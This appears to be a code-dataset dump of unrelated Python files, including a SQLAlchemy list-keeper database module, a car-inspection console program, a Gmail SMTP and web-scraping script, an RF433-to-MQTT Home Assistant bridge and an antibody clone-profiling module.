DatabaseError(e)\n\n with Session() as session:\n results: List[Item] = (\n session.query(Item)\n .filter(Item.collection_id == found_colx.collection_id)\n .all()\n )\n\n if not results:\n raise DatabaseError(f\"No items found for collection '{collection_name}'!\")\n\n return results\n\n\n## Update TODO\n\n\n## Delete\ndef delete_collection_by_name(name: str, guild_id: str) -> None:\n try:\n colx_to_delete: Collection = 
(\n get_collection_by_name(name=name, guild_id=guild_id)\n )\n except DatabaseError as e:\n raise DatabaseError(e)\n\n try:\n with Session() as session: \n session.delete(colx_to_delete)\n session.commit()\n except:\n raise DatabaseError()\n\n\ndef delete_item(collection_name: str, guild_id: str, item_name: str) -> None:\n with Session() as session:\n try:\n parent_collection: Collection = (\n get_collection_by_name(name=collection_name, guild_id=guild_id)\n )\n except DatabaseError as e:\n raise DatabaseError(e)\n \n # TODO abstract this into its own function\n item_to_delete: Item = (\n session.query(Item)\n .filter(Item.collection_id==parent_collection.collection_id)\n .filter(func.lower(Item.name)==item_name.lower())\n .first()\n )\n if item_to_delete is None:\n raise DatabaseError(f\"Item {item_name} not found!\")\n\n try:\n session.delete(item_to_delete)\n session.commit()\n except:\n raise DatabaseError(f\"Unable to delete item '{item_name}'\")\n\n\n## ID Management\nwith Session() as session:\n tmp: List[Item] = session.query(Item).all() # These two lines create a set of all ids in use, to prevent creating duplicates\n used_ids: Set[str] = set([i.collection_id for i in tmp] + [j.item_id for j in tmp])\n\ndef generate_id() -> str:\n while True: # loop until we get a unique ID\n id: str = secrets.token_hex(4)\n if id not in used_ids:\n used_ids.add(id)\n return id","sub_path":"cogs/utils/listkeeper/lkdb.py","file_name":"lkdb.py","file_ext":"py","file_size_in_byte":6612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"50995908","text":"from redsolutioncms.make import BaseMake\nfrom redsolutioncms.models import CMSSettings\nfrom sandbox.models import SandboxSettings\n\nclass Make(BaseMake):\n def make(self):\n super(Make, self).make()\n cms_settings = CMSSettings.objects.get_settings()\n sandbox_settings = SandboxSettings.objects.get_settings()\n cms_settings.render_to(['..', 'media', 'css', 'style.css'], 'sandbox/redsolutioncms/style.css', {\n 'sandbox_settings': sandbox_settings,\n })\n cms_settings.render_to(['..', 'templates', 'base.html'], 'sandbox/redsolutioncms/base.html', {\n 'sandbox_settings': sandbox_settings,\n }, 'w')\n","sub_path":"sandbox/make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"237951557","text":"# you have already created UserSerializer\nfrom .serializers import CustomUserSerializer\n\n\ndef jwt_response_payload_handler(token, user=None, request=None):\n user = CustomUserSerializer(user, context={'request': request}).data\n return {\n 'token': token,\n 'user_name': user['user_name'],\n 'is_staff': user['is_staff'],\n }\n","sub_path":"spareparts_backend/crushing_spareparts/users/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"576380894","text":"class Car():\r\n def __init__(self,registration, make):\r\n self.__mileage__ = 0\r\n self.__registration__ = registration\r\n self.__make__ = make\r\n self.__dateOfInspection__ = None\r\n self.__year__ = str((self.__registration__[2] + self.__registration__[3]))\r\n\r\n\r\n def getYear(self):\r\n if self.__year__[0] == '5' or self.__year__[0] == '6':\r\n self.__year__= int(self.__year__)-50\r\n return self.__year__\r\n \r\n def getRegistration(self):\r\n return self.__registration__\r\n \r\n def getMake(self):\r\n 
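# --- added note (interpretation of the code above, not from the original file) ---
# getYear decodes UK-style plates: chars 3-4 of the registration are the age
# identifier, and second-half registrations ('5x'/'6x') subtract 50, e.g.
#   Car('BL67 WFR', 'x').getYear()  ->  17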
return self.__make__\r\n \r\n def getMileage(self):\r\n return self.__mileage__\r\n \r\n def getDateOfInspection(self):\r\n return self.__dateOfInspection__\r\n\r\n def setInspectionData(self, mileage, dateOfInsp):\r\n self.__mileage__ = mileage\r\n self.__dateOfInspection__ = dateOfInsp\r\n\r\n\r\n def needNewCar(self):\r\n self.getYear()\r\n if int(self.__year__)< 14:\r\n return True\r\n else:\r\n return (19-int(self.__year__))\r\n \r\n\r\ndef menu():\r\n print('1. To input new car details')\r\n print('2. To print details')\r\n print('3. To check if you need a new car')\r\n print('4. To view all cars')\r\n print('0. To exit')\r\n print()\r\n choice = input('Enter option: ')\r\n while True:\r\n try:\r\n choice = int(choice)\r\n break\r\n except ValueError:\r\n print('\\nPlease enter a valid option')\r\n choice = input()\r\n return choice\r\n\r\ndef details(cars):\r\n print()\r\n allCars(cars)\r\n print()\r\n car = input('Which car do you want to check? ')\r\n try:\r\n car=cars.get(int(car))\r\n except ValueError:\r\n car=cars.get(car)\r\n while True:\r\n try:\r\n print('\\nYour registration is: ',car.getRegistration())\r\n print('Your make is: ',car.getMake())\r\n print('Your mileage is: ',car.getMileage())\r\n print('Your date of inspection is: ',car.getDateOfInspection())\r\n break\r\n except AttributeError as e:\r\n #print(e)\r\n print('\\nPlease enter a valid car name from the list below')\r\n allCars(cars)\r\n car = input()\r\n car = cars.get(car)\r\n\r\ndef allCars(cars):\r\n for key,value in cars.items():\r\n print(key ,':' ,value.getMake(),',',value.getRegistration())\r\n print()\r\n \r\n \r\n\r\ndef addCar():\r\n reg = input('Enter reg: ')\r\n name = input('Enter name: ')\r\n newCar = Car(reg,name)\r\n inspData = input('Set inspection data?Y or N ')\r\n if inspData == 'Y':\r\n miles = input('Enter no. 
of miles: ' )\r\n date = input('Enter date of inspection: ')\r\n newCar.setInspectionData(miles,date)\r\n \r\n return name, newCar\r\n \r\ndef main():\r\n cars = 0\r\n car1 = Car('BL17 WFR', 'toyota aygo')\r\n car1.setInspectionData(5000, '03/07/18')\r\n carDict = {'default':car1}\r\n\r\n option = menu()\r\n while option != 0:\r\n if option ==1:\r\n name, newCar= addCar()\r\n cars +=1\r\n carDict.update({cars: newCar})\r\n if option == 2:\r\n details(carDict)\r\n if option == 3:\r\n if car1.needNewCar() == True:\r\n print('You need a new car')\r\n else:\r\n remainingYrs = car1.needNewCar()\r\n print('Your car is fine: You have',remainingYrs,'years remaining')\r\n if option == 4:\r\n allCars(carDict)\r\n print()\r\n option = menu()\r\n print('goodbye')\r\n \r\nmain ()\r\n\r\n\r\n","sub_path":"car program v3.py","file_name":"car program v3.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"9305415","text":"# %load q03_pearson_correlation/build.py\r\n# Default Imports\r\nimport pandas as pd\r\nimport numpy as np\r\ndataframe_1 = pd.read_csv('data/house_prices_multivariate.csv')\r\ndataframe_2 = pd.read_csv('data/house_prices_copy.csv')\r\n\r\ndef correlation():\r\n x=dataframe_1['SalePrice']\r\n y=dataframe_2['SalePrice']\r\n return np.corrcoef(x,y)[0,1]\r\n# Rurn the correlation value between the SalePrice column for the two loaded datasets\r\n# Your code here\r\n#correlation()\r\n","sub_path":"q03_pearson_correlation/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"486318140","text":"from threading import local\n\n\ndefault_app_config = 'models_logging.apps.LoggingConfig'\n\n\nclass _Local(local):\n \"\"\"\n :param stack_changes: all changes grouped by (object_id, content_type_id)\n it's created for grouping changes that called by multiple using of obj.save() per 1 request|operation\n \"\"\"\n def __init__(self):\n self.user = None\n self.ignore_changes = False\n self.stack_changes = {}\n\n def ignore(self, sender, instance):\n if isinstance(self.ignore_changes, (tuple, list)) and sender in self.ignore_changes:\n return True\n elif self.ignore_changes is True:\n return True\n elif instance.get_deferred_fields():\n # if does'nt ignore defered_fields\n # we will catch excpetion (max recursion depth)\n return True\n\n\n_local = _Local()","sub_path":"models_logging/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"575333554","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n    path('info', views.info, name='info'),\n    path('maintanence', views.maintanence, name='maintanence'),\n    path('pay', views.pay, name='pay'),\n    path('portal', views.dashboard, name='dashboard'),\n    path('login', views.login, name='login'),\n    path('', views.index, name='index')\n\n]","sub_path":"dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"507686912","text":"#-------------------------------------------------------------------------------\n# Name:        test_log_entry\n# Purpose:     Validating that log_entry works as expected\n#\n# Author:      Rudy\n#\n# Created:     30/11/2013\n#-------------------------------------------------------------------------------\n\nimport unittest\nfrom .log_entry import LogEntry, dateFormatRotation\n\nlogEntry1=\"192.168.1.3 - - [30/11/2013:11:59:14 +0100] \\\"PUT /api/browse/date\\\" 301 2297\"\nlogEntry2=\"192.168.1.3 - - [30/11/2013:11:59:14 -0000] \\\"PUT /blog/december/30 HTTP/1.1\\\" 301 2297\"\nlogEntry3=\"192.168.1.3 - - [30/11/2013:11:59:14 -0100] \\\"PUT /blog/december/30\\\" 301 2297\"\n\nclass test_log_entry(unittest.TestCase):\n\n    def testInit(self):\n        entry= LogEntry(logEntry1)\n        self.assertEqual(entry.section,\"api\")\n        self.assertEqual(entry.epoch,1385809154)\n\n        entry = LogEntry(logEntry2)\n        self.assertEqual(entry.section,\"blog\")\n        self.assertEqual(entry.epoch,1385812754)\n\n        entry = LogEntry(logEntry3)\n        self.assertEqual(entry.section,\"blog\")\n        self.assertEqual(entry.epoch,1385816354)\n\n    def test_dateFormatRotation(self):\n        formats=dateFormatRotation()\n        generator=formats.formatStorage()\n        self.assertEqual(next(generator),\"%d/%m/%Y %H:%M:%S\")\n        self.assertEqual(next(generator),\"%d/%m/%Y %H:%M:%S\")\n        formats.changeFormat()\n        self.assertEqual(next(generator),\"%d/%m/%Y:%H:%M:%S\")\n        formats.changeFormat()\n        formats.changeFormat()\n        self.assertEqual(next(generator),\"%d/%m/%Y %H:%M:%S\")\n\n\n\ndef main():\n    unittest.main()\n\nif __name__ == '__main__':\n    main()\n","sub_path":"log_monitor/test_log_entry.py","file_name":"test_log_entry.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"199075309","text":"# -*- coding: utf-8 -*-\nfrom selenium import webdriver #(1) web automation, still learning :pip install \nimport chromedriver_binary #(1) web automation, still learning\n#pip install chromedriver-binary==87.0.4280.88.0 # match the version to the installed Chrome\nimport time #(2)\nimport datetime #(2)\n#driver = webdriver.Firefox() #(1)\n#driver.get(\"http://www.google.com\") #(1)\n#driver.execute_script(\"document.getElementById('lga').style.display = 'none';\") #(1)\n#(0) web scraping, already learned\nfrom bs4 import BeautifulSoup\nimport requests\n#(0) mail, already learned\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.utils import formatdate\nimport ssl\n#----------------------------------------now, let's begin----------------------------------------------\n#(0) mail, already learned\nFROM_ADDRESS = '(specify)'\nMY_PASSWORD = '(specify)'\nTO_ADDRESS = '(specify)'\nBCC = '' \nSUBJECT = 'via the Gmail SMTP server'\n#mail body\nBODY = 'sending mail from python \\n'\n# mail the contents written in a file -------- addition\nf = open(\"(specify)/xx.txt\",\"r\") #★ changeable #r:read\nfor line in f:\n    print(line)\n    BODY += '\\n'+line\nf.close()  # close the read handle; f is reused for writing further below\n\n\ndef create_message(from_addr, to_addr, bcc_addrs, subject, body):\n    msg = MIMEText(body)\n    msg['Subject'] = subject\n    msg['From'] = from_addr\n    msg['To'] = to_addr\n    msg['Bcc'] = bcc_addrs\n    msg['Date'] = formatdate()\n    # the body is already the MIMEText payload; no extra 'Body' header is needed\n\n    return msg\n\n\ndef send(from_addr, to_addrs, msg):\n    #context = ssl.create_default_context()\n    smtpobj = smtplib.SMTP_SSL('smtp.gmail.com', 465, timeout=10)\n    smtpobj.login(FROM_ADDRESS, MY_PASSWORD)\n    smtpobj.sendmail(from_addr, to_addrs, msg.as_string())\n    smtpobj.close()\n\n# do the mail sending ~send\nif __name__ == '__main__':\n\n    to_addr = TO_ADDRESS\n    subject = SUBJECT\n    body = BODY\n\n    msg = create_message(FROM_ADDRESS, to_addr, BCC, subject, body)\n    send(FROM_ADDRESS, to_addr, msg,) # that's all.\n\n\n#DateTime\nnow = datetime.datetime.now()\n#now.year+\n\n#file\nf = open(\"(specify)/(folder name)\"+str(now.year)+str(now.month)+str(now.day)+str(now.hour)+str(now.minute)+str(now.second)+\".html\",\"a\")\n# f.write(str(now))\n# that's all. 27get\n\n#1st.\n# take a URL, return the html\ndef url_to_soup(url):\n    # get the response object\n    response = requests.get(url)\n    # encoding=>utf-8\n    response.encoding = response.apparent_encoding\n    # store the response text in the variable html\n    html=response.text\n    # initialise BeautifulSoup with the html-format text,\n    return BeautifulSoup(html, 'html.parser') # initialising BeautifulSoup\n\n\n#url=\"https://ja.wikipedia.org/wiki/メインページ\"\nurl=\"https://ja.wikipedia.org/wiki/特別:新しいページ\"\n# url=\"\"\n# url=\"\"\n# url=\"\"\n#soup=url_to_soup(url) # returns html-format text from the url string\n#f.write(str(soup))\n\n\n\n#myEDIT.\n#mw-parser-output #<p><a> #<----*set this to style=\"opacity:0.5;\"---->\n#mw-parser-output #<p><a> #<----*set this to style=\"opacity:1;\"---->\n#mw-parser-output #<p><a> #<----*set this to style=\"onClick=class\"---->\n# driver = webdriver.Chrome()\n# driver.get('https://www.google.com/')\n# time.sleep(2)\n# search_box = driver.find_element_by_name(\"q\")\n# #search_box.send_keys('ChromeDriver')\n# search_box.send_keys('クイズ 2020年12月')\n# search_box.submit()\n# time.sleep(600)\n# driver.quit()\n# driver = webdriver.Chrome()\n# driver.get(\"http://www.google.com\")\n# driver.execute_script(\"document.getElementById('lga').style.display = 'none';\")\n\n\n","sub_path":"5th_selenium.py","file_name":"5th_selenium.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"258447007","text":"import ast \nimport pandas as pd\nimport numpy as np\n\n\n'''\n***THIS IS A PRELIMINARY SCRIPT - AT A LATER DATE THIS SECTION OF THE PROJECT WILL OCCUPY ITS OWN JUPYTER NOTEBOOK***\n\n\n\nMany of the fields in the GiantBomb API query results are formatted as json references to separate API resources. Since querying the full content of those resources is beyond the scope of this project and would constitute undue strain\non GiantBomb's api, here we will simply pull relevant details out of the json string and export them to their own .csvs. 
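For instance, a single 'platforms' cell holding a list like [{'id': 94, 'name': 'PC'}] (values illustrative) would be reduced to the id list [94] in the main table, while the full dicts land in platforms.csv. 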
Because these will come from the data we have queried for this project, this will not be a complete representation\nof the data hosted on GiantBomb, but rather a catalog of the field values appearing in this project's data.\n\nHere we will identify the columns we want to parse, convert the json strings to dicts, pull out the relevant info, and replace the values in the source dataframe/csv/table with the id reference to cut down on redundancy.\n\n'''\n\n\n\n\ndef parse_json(in_df, fields):\n\n #games details - future goal is to make this function generic so that it can be run against all api query csvs\n for field in fields: #columns from data source that are formatted as api references\n \n out_df = pd.DataFrame()\n for idx in in_df.index: #needs to be run for each record to capture all unique values for each field\n \n item_list = []\n \n\n \n json_string = in_df.loc[idx][field]\n \n try:\n json_eval = ast.literal_eval(json_string) #returns json object as python dict\n except:\n continue\n\n #replace api references in source data with python list of unique ids, append record dicts to output dataframe\n for item in json_eval:\n item_list.append(item['id'])\n out_df = out_df.append(item, ignore_index=True)\n \n in_df.at[idx, field] = item_list\n\n \n out_df.drop_duplicates().to_csv('./data/' + field + '.csv', index=False) #only export unique records\n\n return in_df\n\n\n\n\n\ndef main():\n \n df = pd.read_csv('./data/game_details.csv')\n field_list = ['platforms', 'franchises', 'developers']\n parsed_df = parse_json(df, field_list)\n parsed_df.to_csv('./data/game_details_parsed.csv', index=False)\n\nmain()\n","sub_path":"data_wrangling/parse_json_columns.py","file_name":"parse_json_columns.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"319288752","text":"from matplotlib.pyplot import figure, gca, show\nfrom numpy import abs, asarray, in1d, where\n\n\ndef compute_enrichment_score(gene_scores,\n gene_set_genes,\n power=1,\n statistic='auc',\n plot=False):\n \"\"\"\n Compute how much gene scores enrich gene-set genes.\n Arguments:\n gene_scores (Series): (n_genes_with_score); sorted and indexed by gene\n gene_set_genes (iterable): (n_genes)\n power (number): power to raise gene_scores\n statistic (str): 'auc' (area under curve) | 'ks' (Kolmogorov-Smirnov)\n plot (bool): whether to plot the mountain plot\n Returns:\n float: enrichment score\n \"\"\"\n\n gene_scores = gene_scores.sort_values(ascending=False)\n\n in_ = in1d(gene_scores.index, gene_set_genes, assume_unique=True)\n\n if power != 1:\n gene_scores = abs(asarray(gene_scores))**power\n\n in_int = in_.astype(int)\n hit = (gene_scores * in_int) / gene_scores[in_].sum()\n miss = (1 - in_int) / (in_.size - in_.sum())\n y = hit - miss\n\n cumulative_sums = y.cumsum()\n\n if statistic == 'auc':\n enrichment_score = cumulative_sums.sum()\n\n elif statistic == 'ks':\n max_ = cumulative_sums.max()\n min_ = cumulative_sums.min()\n enrichment_score = where(abs(min_) < abs(max_), max_, min_)\n\n else:\n raise ValueError('Unknown statistic: {}.'.format(statistic))\n\n if plot:\n figure(figsize=(8, 5))\n ax = gca()\n ax.plot(range(in_.size), in_, color='#808080', alpha=0.16)\n ax.plot(range(in_.size), y, color='#9017E6')\n ax.plot(range(in_.size), cumulative_sums, color='#20D9BA')\n show()\n\n return 
enrichment_score\n","sub_path":"gsea/compute_enrichment_score.py","file_name":"compute_enrichment_score.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"90607452","text":"#!/usr/bin/python\n#from gpiozero import MotionSensor\nfrom time import sleep\nimport paho.mqtt.client as mqtt, time, sys\nimport os\nimport re\nimport threading\nimport subprocess\nfrom array import array\nMQTT_PASSWORD=\"MY_PASSWORD\"\nMQTT_USER=\"MY_USER\"\n\n#motion = MotionSensor(4, pull_up=None, active_state=True, sample_rate=4)\nRF_STATE_TOPIC=\"homeassistant/binary_sensor/switch{}/state\"\nprint(\"Start\")\n#p = subprocess.Popen(['/home/pi/rc-switch-pi-examples/receivedemo', ''], stdout=subprocess.PIPE, shell=True)\n#process.Popen(['/usr/local/bin/receiveRf400', ''], stderr=subprocess.PIPE, stdout=subprocess.PIPE, bufsize=1, universal_newlines=True)\nRF_COMMAND=\"/usr/local/bin/receiveRf400\"\n#p = subprocess.Popen(['ls', '-l'], stdout=subprocess.PIPE, shell=True)\nglobal popen\nglobal detectedSwitches \ndetectedSwitches = array('l')\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected\")\n client.is_connected = True\n\ndef on_message(client, userdata, message):\n print(\"Message\")\n\ndef publishMotion():\n global detected\n\nserverIp=\"192.168.1.2\"\nclient = mqtt.Client()\n# if you need a username and/or password for mqtt uncomment next line\nclient.username_pw_set(MQTT_USER, password=MQTT_PASSWORD)\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.is_connected = False\nclient.loop_start()\nclient.connect(serverIp) # replace \"control_central\" with ip address or name of server\n\ndef newSwitchDetected(number):\n topic=\"homeassistant/binary_sensor/switch{}/config\".format(number)\n stateTopic=\"{{\\\"name\\\": \\\"switch{}\\\", \\\"state_topic\\\":\\\"\"+RF_STATE_TOPIC+\"\\\" }}\"\n stateTopic=stateTopic.format(number, number)\n sys.stdout.write(stateTopic+\"\\n\")\n sys.stdout.write(topic+\"\\n\")\n client.publish(topic,stateTopic, retain=True)\n\ndef checkForNewSwitch(number):\n if not number in detectedSwitches:\n sys.stdout.write(\"New switch: \"+str(number)+\"\\n\")\n detectedSwitches.append(number)\n newSwitchDetected(int(number))\n\ndef execute(cmd):\n popen = subprocess.Popen(cmd, stdout=subprocess.PIPE, universal_newlines=True)\n for stdout_line in iter(popen.stdout.readline, \"\"):\n stdout_line.split()\n splitted=stdout_line.split()\n #sys.stdout.write(\"Length: \"+str(len(splitted)))\n if len(splitted) == 2:\n checkForNewSwitch(int(splitted[0]))\n sys.stdout.write(\"Switch\"+splitted[0]+\" Value:\"+splitted[1]+\"\\n\")\n topic=RF_STATE_TOPIC.format(splitted[0])\n client.publish(topic,\"ON\" if splitted[1] == \"1\" else \"OFF\", retain=True)\n #client.publish(topic,splitted[1], retain=True)\n #yield stdout_line \n popen.stdout.close()\n return_code = popen.wait()\n if return_code:\n raise subprocess.CalledProcessError(return_code, cmd)\n\ndef cleanup():\n#client.publish(\"homeassistant/binary_sensor/raspbiMotion/config\",'', retain=True)\n client.loop_stop()\n client.disconnect()\n popen.kill()\n\n#execute(\"/home/pi/rc-switch-pi-examples/receive\")\nfor path in execute([RF_COMMAND,\"\"]):\n print(path, end=\"\")\nwhile True:\n checkForNewSwitch(int(\"10\"))\n 
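# Aside: a hedged sketch of the Home Assistant MQTT discovery publish that
# newSwitchDetected() in the rf433Detection.py record above performs; the client
# is assumed to be already connected, and the topic layout follows the record's
# own conventions.
import json
import paho.mqtt.client as mqtt

def announce_switch(client, number):
    config_topic = "homeassistant/binary_sensor/switch%d/config" % number
    payload = json.dumps({
        "name": "switch%d" % number,
        "state_topic": "homeassistant/binary_sensor/switch%d/state" % number,
    })
    # retain=True so Home Assistant rediscovers the sensor after a broker restart
    client.publish(config_topic, payload, retain=True)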
time.sleep(1)\n\natexit.register(cleanup)\n\n","sub_path":"rf433Detection.py","file_name":"rf433Detection.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"394569698","text":"#!/usr/bin/env python3\nimport os, re, sys, logging, csv, multiprocessing\n\nimport pandas as pd\nfrom HTGTSrep.mutprofile import profile_Protein, stat_Protein\nfrom HTGTSrep.lib import getDNADistMatrix, calcDistances, formClusters, \\\n hier_clust, collapse_db, profile_DNAmut, getInputSeq, \\\n getInferSeq, profile_DNAmut_clonal, profile_DNAmut_clonal_errbar\nfrom scipy.stats import sem\n\ndef define_clones(records, args):\n '''\n Pre-group records based on V, J and junction length\n '''\n if args.cluster_by_gene:\n records['J_GENE'] = records['J_ALLELE'].str.split('*').str[0]\n ### 09242020 added 'V_ALLELE' to grouped = records.groupby(['V_ALLELE', 'J_GENE', 'JUNCTION_LENGTH'])\n grouped = records.groupby(['V_GENE', 'J_GENE', 'JUNCTION_LENGTH'])\n else:\n ### 09242020 added 'V_ALLELE' to grouped = records.groupby(['V_ALLELE', 'J_GENE', 'JUNCTION_LENGTH'])\n grouped = records.groupby(['V_ALLELE', 'J_ALLELE', 'JUNCTION_LENGTH'])\n records['clonetmp'] = '-'\n records['CLONE'] = '-'\n for key, group in grouped:\n if len(group) == 1:\n ### 09152020 Lawrence: updated from records.ix to records.loc\n records.loc[group.index, 'clonetmp'] = group['SEQUENCE_ID']\n else:\n clonelist = hier_clust(group, args.dist)\n ### 09162020 Lawrence: updated from records.set_value(group.index, 'clonetmp', clonelist)\n ### to records.at[group.index, 'clonetmp'] = clonelist\n records.at[group.index, 'clonetmp'] = clonelist\n clone_num = 1\n for key, group in records.groupby('clonetmp'):\n ### 09152020 Lawrence: updated from records.ix to records.loc\n records.loc[group.index, 'CLONE'] = clone_num\n clone_num += 1\n records.drop('clonetmp', inplace=True, axis=1)\n records.sort_values('CLONE', ascending=True, inplace=True)\n return records\n\ndef write_cloneDb(records, outputfile, args):\n droplist = [\"V_BTOP\", \"STRAND\",\n 'D_SEQ_START', 'D_SEQ_LENGTH', 'D_GERM_START', 'D_GERM_LENGTH',\n 'J_SEQ_START', 'J_SEQ_LENGTH', 'J_GERM_START', 'J_GERM_LENGTH',\n \"NP1_LENGTH\", \"NP2_LENGTH\",\n \"V_SEQ_START\", \"V_SEQ_LENGTH\", \"V_GENE_LEN\", \"V_GENE_GAP_LEN\",\n \"V_GERM_START_VDJ\", \"V_GERM_END_VDJ\",\n \"V_GERM_START_IMGT\",\n \"V_ALLELE_NUC\", \"GERMLINE_IMGT_D_MASK\",\n \"SEQUENCE_INPUT\", \"SEQUENCE_VDJ\"]\n records_output = records.drop(droplist, axis=1)\n records_output.to_csv(outputfile, sep=\"\\t\", index=False)\n\ndef AAprofile_clones(group, sample, args):\n ''' Do protein profiling\n '''\n clone = group['CLONE'].values[0]\n protein_file = \"%s/%s_clonal/protein_text/%s.clone%d.%s.%s.protein.txt\" % (\n args.outdir, sample, sample, clone, args.muttype, args.productivetype)\n protein_file = re.sub(r'[*)(]', '-', protein_file)\n protein_PDF = \"%s/%s_clonal/protein_profile/%s.clone%d.%s.%s.eps\" % (\n args.outdir, sample, sample, clone, args.muttype, args.productivetype)\n protein_PDF = re.sub(r'[*)(]', '-', protein_PDF)\n Vgapseq = getInputSeq(args.__dict__['params_dict']['Vgapseq'])\n reads_db = profile_Protein(group, protein_file, protein_PDF, Vgapseq, args)\n stat_file = \"%s/%s_clonal/protein_text/%s.clone%d.%s.%s.protein.txt\" % (\n args.outdir, sample, sample, clone, args.muttype, args.productivetype)\n stat_Protein(protein_file, Vgapseq, group['V_ALLELE'].values[0], reads_db)\n\ndef DNAprofile_clones(group, sample, args, 
profileType):\n \"\"\"\n Generate DNA and Protein mutation profiles for clones\n \"\"\"\n clone = group['CLONE'].values[0]\n V_ALLELE = group['V_ALLELE'].values[0]\n if profileType == 'sepCluster':\n dirprefix = \"%s/%s_clonal\" % (args.outdir, sample)\n elif profileType == 'mixCluster':\n dirprefix = \"%s/allsample_clonal\" % args.outdir\n\n nuc_profile = \"%s/nucl_text/clone%s.%s.%s.%s.nuc.txt\" % (\n dirprefix, clone, sample, args.muttype, args.productivetype)\n nuc_stat = \"%s/nucl_text/clone%s_%s.%s.%s.%s.stat.txt\" % (\n dirprefix, clone, V_ALLELE, sample, args.muttype, args.productivetype)\n nuc_PDF = \"%s/nucl_profile/clone%s.%s.%s.%s.pdf\" % (\n dirprefix, clone, sample, args.muttype, args.productivetype)\n\n profile_DNAmut(group, nuc_stat, nuc_PDF, nuc_profile, args)\n\ndef DNAprofile_clones_errbar(group, sample_errbar, args):\n ''' Collect stat data from diff samples\n '''\n clone = group['CLONE'].values[0]\n allele = group[\"V_ALLELE\"].values[0]\n dirprefix = \"%s/allsample_clonal/\" % args.outdir\n sample_files = {}\n for sample in sample_errbar:\n nuc_PDF = \"%s/nucl_profile/clone%s.%s.%s.%s.pdf\" % (\n dirprefix, clone, sample, args.muttype, args.productivetype)\n nuc_stat = \"%s/nucl_text/clone%s_%s.%s.%s.%s.stat.txt\" % (\n dirprefix, clone, allele, sample, args.muttype, args.productivetype)\n sample_files[sample] = [nuc_PDF, nuc_stat]\n ### print to find if the correct file paths are generated. trying to solve missing stat file\n # print(\"finding \", sample_files[sample],file = sys.stderr)\n nuc_PDF_errbar = \"%s/nucl_profile_errbar/clone%s.%s.%s.errbar.pdf\" % (\n dirprefix, clone, args.muttype, args.productivetype)\n nuc_stat_errbar = \"%s/nucl_text_errbar/clone%s_%s.%s.%s.stat.errbar.txt\" % (\n dirprefix, clone, allele, args.muttype, args.productivetype)\n\n # Load CDR3\n if allele in args.__dict__['V_CDR']:\n cdr = args.__dict__['V_CDR'][allele]\n cdrstring = 'cdr1_start=%s cdr1_end=%s cdr2_start=%s cdr2_end=%s ' \\\n 'cdr3_start=%s cdr3_end=%s' % (cdr[0], cdr[1], cdr[2],\n cdr[3], cdr[4], cdr[5])\n else:\n cdrstring = ''\n\n if len(sample_errbar) == 1:\n nuc_PDF_sample = sample_files[sample_errbar[0]][0]\n print(\"DNAprofile_clones_errbar did not output a file, because len(sample_errbar) == 1\", file = sys.stderr)\n # if os.path.exists(nuc_PDF_sample):\n # os.system('cp %s %s' % (nuc_PDF_sample, nuc_PDF_errbar))\n else:\n stat_list = []\n for sample in sample_files:\n stat = pd.read_csv(sample_files[sample][1], sep=\"\\t\")\n stat_list.append(stat)\n stat_all = pd.concat(stat_list, ignore_index=True)\n\n pos_max = stat_all['Pos'].max()\n statcols = list(stat_all) + ['Err']\n stat_new = pd.DataFrame(columns=statcols, dtype='int64')\n stat_new = stat_new.astype('int64')\n stat_new['Base'] = stat_new['Base'].astype('str')\n stat_new['Y'] = stat_new['Y'].astype('float')\n for i in range(1, pos_max+1):\n group = stat_all.loc[stat_all['Pos']==i]\n Pos = i\n Mut = group['Mut'].sum()\n Total = group['Total'].sum()\n Base = list(group['Base'])[0]\n A = group['A'].sum()\n T = group['T'].sum()\n C = group['C'].sum()\n G = group['G'].sum()\n\n group_Y = group[group['Total']>0]\n Err = 0\n if len(group_Y) == 0: Y = 0\n else: Y = group_Y['Y'].sum()/len(group_Y)\n if len(group_Y) > 1:\n Err = sem(group_Y['Y'])\n stat_new.loc[i] = [int(Pos), int(Mut), int(Total), str(Base), Y,\n int(A), int(T), int(C), int(G), Err]\n stat_new.to_csv(nuc_stat_errbar, sep=\"\\t\", index=False)\n if not args.skipTree:\n os.system('Rscript %s/HTGTSrep/R/SHMPlot2.R %s %s plotrows=1 figureheight=2 '\n 
